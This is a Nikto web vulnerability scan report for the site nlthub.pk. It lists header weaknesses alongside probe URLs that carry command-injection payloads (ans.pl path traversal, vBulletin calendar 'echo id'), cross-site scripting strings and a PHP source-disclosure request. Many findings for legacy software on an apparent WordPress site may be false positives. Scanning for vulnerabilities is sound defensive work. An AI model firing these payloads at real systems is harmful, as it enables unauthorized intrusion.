nlthub.pk / 185.254.199.252 port 80
Target IP 185.254.199.252
Target hostname nlthub.pk
Target Port 80
HTTP Server Apache
Site Link (Name) http://nlthub.pk:80
Site Link (IP) http://185.254.199.252:80

URI /
HTTP Method GET
Description Cookie wpdiscuz_nonce_8053d2bdd3631faf9299ed72ebbbd671 created without the httponly flag
Test Links http://nlthub.pk:80/
http://185.254.199.252:80/
OSVDB Entries OSVDB-0
URI /
HTTP Method GET
Description The anti-clickjacking X-Frame-Options header is not present.
Test Links http://nlthub.pk:80/
http://185.254.199.252:80/
OSVDB Entries OSVDB-0
URI /
HTTP Method GET
Description Uncommon header 'referrer-policy' found, with contents: no-referrer-when-downgrade
Test Links http://nlthub.pk:80/
http://185.254.199.252:80/
OSVDB Entries OSVDB-0
URI /
HTTP Method GET
Description Uncommon header 'x-redirect-by' found, with contents: WordPress
Test Links http://nlthub.pk:80/
http://185.254.199.252:80/
OSVDB Entries OSVDB-0
URI /yOcwUfKl.access
HTTP Method GET
Description Uncommon header 'link' found, with contents: <https://nlthub.pk/wp-json/>; rel="https://api.w.org/"
Test Links http://nlthub.pk:80/yOcwUfKl.access
http://185.254.199.252:80/yOcwUfKl.access
OSVDB Entries OSVDB-0
URI /robots.txt
HTTP Method GET
Description Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x31 0x64dffdcc5bcb4
Test Links http://nlthub.pk:80/robots.txt
http://185.254.199.252:80/robots.txt
OSVDB Entries OSVDB-0
URI //*-and-*/
HTTP Method GET
Description File/dir '/*-and-*/' in robots.txt returned a non-forbidden or redirect HTTP code (301)
Test Links http://nlthub.pk:80//*-and-*/
http://185.254.199.252:80//*-and-*/
OSVDB Entries OSVDB-0
URI /robots.txt
HTTP Method GET
Description "robots.txt" contains 2 entries which should be manually viewed.
Test Links http://nlthub.pk:80/robots.txt
http://185.254.199.252:80/robots.txt
OSVDB Entries OSVDB-0
URI HASH(0x575ee6e60d30)
HTTP Method DEBUG
Description DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
Test Links http://nlthub.pk:80HASH(0x575ee6e60d30)
http://185.254.199.252:80HASH(0x575ee6e60d30)
OSVDB Entries OSVDB-0
URI /bin/formmail.cgi
HTTP Method GET
Description /bin/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
Test Links http://nlthub.pk:80/bin/formmail.cgi
http://185.254.199.252:80/bin/formmail.cgi
OSVDB Entries OSVDB-0
URI /bin/formmail.pl
HTTP Method GET
Description /bin/formmail.pl: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
Test Links http://nlthub.pk:80/bin/formmail.pl
http://185.254.199.252:80/bin/formmail.pl
OSVDB Entries OSVDB-0
URI /bin/formmail
HTTP Method GET
Description /bin/formmail: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
Test Links http://nlthub.pk:80/bin/formmail
http://185.254.199.252:80/bin/formmail
OSVDB Entries OSVDB-0
URI /bin/ans.pl?p=../../../../../usr/bin/id|&blah
HTTP Method GET
Description /bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
Test Links http://nlthub.pk:80/bin/ans.pl?p=../../../../../usr/bin/id|&blah
http://185.254.199.252:80/bin/ans.pl?p=../../../../../usr/bin/id|&blah
OSVDB Entries OSVDB-724
URI /bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
HTTP Method GET
Description /bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
Test Links http://nlthub.pk:80/bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
http://185.254.199.252:80/bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
OSVDB Entries OSVDB-724
URI /userinfo.php?uid=1;
HTTP Method GET
Description /userinfo.php?uid=1;: Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.
Test Links http://nlthub.pk:80/userinfo.php?uid=1;
http://185.254.199.252:80/userinfo.php?uid=1;
OSVDB Entries OSVDB-9392
URI /phpimageview.php?pic=javascript:alert(8754)
HTTP Method GET
Description /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Test Links http://nlthub.pk:80/phpimageview.php?pic=javascript:alert(8754)
http://185.254.199.252:80/phpimageview.php?pic=javascript:alert(8754)
OSVDB Entries OSVDB-27071
URI /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0
HTTP Method GET
Description /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Test Links http://nlthub.pk:80/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0
http://185.254.199.252:80/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0
OSVDB Entries OSVDB-0
URI /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
HTTP Method GET
Description /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Test Links http://nlthub.pk:80/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
http://185.254.199.252:80/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
OSVDB Entries OSVDB-0
URI /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22
HTTP Method GET
Description /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Test Links http://nlthub.pk:80/members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22
http://185.254.199.252:80/members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22
OSVDB Entries OSVDB-4598
URI /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22
HTTP Method GET
Description /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Test Links http://nlthub.pk:80/forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22
http://185.254.199.252:80/forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22
OSVDB Entries OSVDB-2946
URI /mailman/listinfo
HTTP Method GET
Description /mailman/listinfo: Mailman was found on the server.
Test Links http://nlthub.pk:80/mailman/listinfo
http://185.254.199.252:80/mailman/listinfo
OSVDB Entries OSVDB-3233
URI /login/
HTTP Method GET
Description Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
Test Links http://nlthub.pk:80/login/
http://185.254.199.252:80/login/
OSVDB Entries OSVDB-0
URI /login/
HTTP Method GET
Description Uncommon header 'content-security-policy' found, with contents: frame-ancestors 'self';
Test Links http://nlthub.pk:80/login/
http://185.254.199.252:80/login/
OSVDB Entries OSVDB-0
URI /sam
HTTP Method GET
Description Uncommon header 'x-pingback' found, with contents: http://nlthub.pk/xmlrpc.php
Test Links http://nlthub.pk:80/sam
http://185.254.199.252:80/sam
OSVDB Entries OSVDB-0
URI /img-sys/
HTTP Method GET
Description /img-sys/: Default image directory should not allow directory listing.
Test Links http://nlthub.pk:80/img-sys/
http://185.254.199.252:80/img-sys/
OSVDB Entries OSVDB-3092
URI /netbasic/websinfo.bas
HTTP Method GET
Description /netbasic/websinfo.bas: Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.
Test Links http://nlthub.pk:80/netbasic/websinfo.bas
http://185.254.199.252:80/netbasic/websinfo.bas
OSVDB Entries OSVDB-3233
URI /perl/samples/volscgi.pl
HTTP Method GET
Description /perl/samples/volscgi.pl: Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.
Test Links http://nlthub.pk:80/perl/samples/volscgi.pl
http://185.254.199.252:80/perl/samples/volscgi.pl
OSVDB Entries OSVDB-3233
URI /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
HTTP Method GET
Description /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
Test Links http://nlthub.pk:80/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
http://185.254.199.252:80/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
OSVDB Entries OSVDB-3299
URI /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
HTTP Method GET
Description /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
Test Links http://nlthub.pk:80/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
http://185.254.199.252:80/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
OSVDB Entries OSVDB-3299
URI /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
HTTP Method GET
Description /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
Test Links http://nlthub.pk:80/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
http://185.254.199.252:80/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
OSVDB Entries OSVDB-3299
URI /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
HTTP Method GET
Description /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
Test Links http://nlthub.pk:80/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
http://185.254.199.252:80/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
OSVDB Entries OSVDB-3299
URI /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
HTTP Method GET
Description /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
Test Links http://nlthub.pk:80/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
http://185.254.199.252:80/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
OSVDB Entries OSVDB-3299
URI /bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
HTTP Method GET
Description /bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
Test Links http://nlthub.pk:80/bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
http://185.254.199.252:80/bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
OSVDB Entries OSVDB-3299
URI /ans.pl?p=../../../../../usr/bin/id|&blah
HTTP Method GET
Description /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'
Test Links http://nlthub.pk:80/ans.pl?p=../../../../../usr/bin/id|&blah
http://185.254.199.252:80/ans.pl?p=../../../../../usr/bin/id|&blah
OSVDB Entries OSVDB-724
URI /ans/ans.pl?p=../../../../../usr/bin/id|&blah
HTTP Method GET
Description /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
Test Links http://nlthub.pk:80/ans/ans.pl?p=../../../../../usr/bin/id|&blah
http://185.254.199.252:80/ans/ans.pl?p=../../../../../usr/bin/id|&blah
OSVDB Entries OSVDB-724
URI /wp-app.log
HTTP Method GET
Description /wp-app.log: Wordpress' wp-app.log may leak application/system details.
Test Links http://nlthub.pk:80/wp-app.log
http://185.254.199.252:80/wp-app.log
OSVDB Entries OSVDB-0
URI /wordpress/
HTTP Method GET
Description /wordpress/: A Wordpress installation was found.
Test Links http://nlthub.pk:80/wordpress/
http://185.254.199.252:80/wordpress/
OSVDB Entries OSVDB-0
URI /login.php?-s
HTTP Method GET
Description /login.php?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
Test Links http://nlthub.pk:80/login.php?-s
http://185.254.199.252:80/login.php?-s
OSVDB Entries OSVDB-0

Host Summary
Start Time 2026-05-26 09:30:01
End Time 2026-05-26 11:08:09
Elapsed Time 5888 seconds
Statistics 6544 items checked, 0 errors, 38 findings

Scan Summary
Software Details Nikto 2.1.5
CLI Options -h 185.254.199.252 -vhost nlthub.pk -o nikto_report.html -F htm
Hosts Tested 1
Start Time Tue May 26 09:30:00 2026
End Time Tue May 26 11:08:09 2026
Elapsed Time 5889 seconds